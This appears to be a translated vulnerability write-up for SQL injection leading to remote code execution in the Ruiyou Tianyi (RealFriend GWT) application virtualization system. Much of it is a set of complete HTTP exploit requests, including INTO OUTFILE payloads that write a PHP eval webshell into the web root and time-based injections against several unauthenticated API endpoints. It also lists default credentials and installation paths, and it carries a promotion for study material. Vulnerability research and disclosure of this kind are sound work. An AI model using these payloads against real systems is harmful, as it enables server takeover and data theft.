Remember a certain application virtualization system remote code execution

Vulnerability Profile

The Weibu online vulnerability team obtained the remote code execution vulnerability intelligence (0day) of Ruiyou Tianyi application virtualization system through the "X Vulnerability Reward Program". Attackers can execute arbitrary code through this vulnerability, resulting in the system being attacked and controlled. Ruiyou Tianyi application virtualization system is an application virtualization platform based on server computing architecture. It centrally deploys various application software of users to Ruiyou Tianyi service cluster, and the client can access the authorized application software on the server through WEB to realize Centralized applications, remote access, collaborative office, etc.

The vulnerability is because the unauthorized interface does not perform processing verification when receiving parameters, and there is a SQL injection vulnerability, and because mysql in the integrated environment has the permission to write files, writing to the webshell will eventually lead to code execution.

Affected version

5.x <= Ruiyou Tianyi application virtualization system (GWT System) <= 7.0.2.

Environment build

The installation package Gwt7.0.2.1.exe copied from the master is installed in the default mode, and finally

​​

​​

Register online to get a trial http://mop.realor.cn/TrialReg.aspx

​After successful registration

​The default account password on Admin/123isthe login

​​

The default path C:/Program Files (x86)/RealFriend/Rap Server/WebRootis at

​

Default database configuration C:\Program Files (x86)\RealFriend\Rap Server\data\Config\CasDbCnn.dataddress

​​

The account password needs to replace # with = and base64 decoding

To help you study cybersecurity, you can receive a full set of information for free:
① Mind map of cybersecurity learning and growth path
② 60+ classic cybersecurity toolkits
③ 100+ SRC analysis reports
④ 150+ e-books on cybersecurity attack and defense techniques
⑤ The most authoritative CISSP Certification Exam Guide + Question Bank
⑥ More than 1800 pages of CTF Practical Skills Manual
⑦ Collection of the latest interview questions from network security companies (including answers)
⑧ APP Client Security Testing Guide (Android+IOS)

Vulnerability reproduction and analysis

http://192.168.222.148/RAPAgent.XGI?CMD=GetRegInfoView version information via

​​

In order to view the complete sql actually executed by the backend, we can use the getLastSql() method provided by the framework to get the last executed SQL statement

​​

Inject an __IndexController.class.php__dologin

​webroot/casweb/Home/Controller/IndexController.class.php:dologin​

​We see the SQL statement and the request routing for the function

​http://www.casweb.cn.x/index.php?s=/Index/dologin/name/admin/pwd/c4ca4238a0b923820dcc509a6f75849b​

Construct a data packet and print out the corresponding sql statement

​Because the verification code is not enabled by default, you can directly reach the SQL statement

Because when setting up the environment, the integrated mysql environment is used, with DBA authority, so you can write content anywhere in the folder

show global variables like '%secure%';

​​

secure_file_priv='' #Allow writing to any folder

Use the error message to get the absolute path of the project

​Construct payload

POST /index.php?s=/Index/dologin/name HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 221

name=1')+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, '<?php eval($_REQUEST["cmd"]);?>' into outfile 'C:/Program Files (x86)/RealFriend/Rap Server/WebRoot/dologin.php'#

​​​​

​​

Query the account and password of the administrator user

​​

Inject two __ConsoleExternalUploadApi.XGI

​webroot/ConsoleExternalUploadApi.XGI​

​Get three parameters, when the three parameters are not empty, callgetfarminfo​ to process

​webroot/Function.XGI​

​​​

​webroot/Common.XGI​

​There is no verification of

POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 46
Content-Type: application/x-www-form-urlencoded

initParams=1&sign=2&key=FarmName'and sleep(5)#

Modified the code to print out the SQL command

​Construct to implement injection and write to file

POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 170
Content-Type: application/x-www-form-urlencoded

initParams=1&sign=1&key=1'union select '<?php eval($_REQUEST["cmd"]);?>' into outfile 'C:/Program Files (x86)/RealFriend/Rap Server/WebRoot/ConsoleExternalUploadApi.php'#

​​

​​

​​

Inject three __ConsoleExternalUploadApi.XGI__uploadAuthorizeKeyFile

POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 122

initParams=command_uploadAuthorizeKeyFile__user_admin'and+sleep(5)#__pwd_1&key=inner&sign=d3adb9869bd6a377fa452930d920fd10

​​

Inject four __ConsoleExternalApi.XGI__createUser

‍

The subsequent vulnerabilities can generally be described as the same vulnerability, but because of different parameters, they are passed to different locations. Here, only one is used as an example, and the subsequent ones will not be analyzed in detail.

We analyze from ConsoleExternalApi.XGI

​Get the parameters through

​Through the following code, we can get the following conclusions. When the value of $key isinner​ , $keyVal is a fixed value, and the value of $sign ismd5($initparams . $keyVal);​ $initparams needs to include__​ to split the data, and get each parameter

​Then _split to get the value corresponding to each parameter, that is, when the incoming value is a_1__b_2, the final result is a=1&b=2

continue to analyze

​When the value of the incoming cmd is createUser​, enter the corresponding branch and construct the corresponding statement to achieve injection.

POST /ConsoleExternalApi.XGI?initParams=command_createUser__user_admin__pwd_1&key=inner&sign=bd58378906794858b1f57eb272e5d84f HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 46
Content-Type: application/json

{"account":"1'or sleep(5)#",
"userPwd":"1"}

​​

‍

Inject five __ConsoleExternalApi.XGI__getUserDetailByAccount

POST /ConsoleExternalApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 132

initParams=command_getUserDetailByAccount__user_admin__account_1' or sleep(5) and '1&key=inner&sign=e24b8206a168347821a2f10aede99058

​